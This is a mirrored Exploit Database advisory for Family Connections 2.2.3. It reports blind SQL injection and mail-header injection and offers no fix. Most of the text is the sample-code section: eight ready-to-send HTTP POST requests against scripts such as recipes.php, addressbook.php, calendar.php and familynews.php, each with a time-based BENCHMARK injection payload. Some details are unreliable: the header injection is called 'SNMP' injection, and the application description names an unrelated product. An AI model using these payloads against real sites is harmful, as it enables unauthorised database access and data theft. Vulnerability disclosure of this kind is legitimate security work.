family connections 2.2.3 – Multiple Vulnerabilities

• Exploit Database
• 34 阅读

• 作者： Salvatore Fresta
  日期： 2010-05-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12557/

• Family Connections 2.2.3 Multiple Remote Vulnerabilities
  
   NameFamily Connections
   Vendorhttp://www.familycms.com
   Versions Affected 2.2.3
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-10-05
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  
  Based on one of the world's leading structureand content 
  management systems - WebSiteAdmin, WSCreator(WS standing
  for WebSite) is powerful application for handling multiple
  websites.
  
  
  II. DESCRIPTION
  
  Many fields are not properly sanitised.
  
  
  III. ANALYSIS
  
  Summary:
  
   A) Multiple Blind SQL Injection
   B) Multiple SNMP Injection
   
  
  A) Multiple Blind SQL Injection
  
  All numericfieldsthat I tested are vulnerable to Blind
  SQL Injection.
  Thesebugsexistbecause of the use of the unquotes SQL 
  fields (numeric fileds only) whichare not properly sani-
  tised.
  
  
  B) Multiple SNMP Injection
  
  The parameters passed to the mail() PHP functionarenot
  properly sanitised. Thisallowsto inject arbitrary SNMP
  headers.
  
  
  IV. SAMPLE CODE
  
  A) Multiple Blind SQL Injection
  
  POST /path/recipes.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 73
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  POST /path/gallery/upload.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 70
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))
  
  
  POST /path/addressbook.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 74
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  POST /path/addressbook.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 74
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  POST /path/calendar.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 67
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  POST /path/calendar.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length:73
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  POST /path/familynews.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length:73
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  POST /path/familynews.php HTTP/1.1
  Host: targethost
  Content-Type: application/x-www-form-urlencoded
  Content-Length:73
  Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
  
  delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
  
  
  V. FIX
  
  No Fix.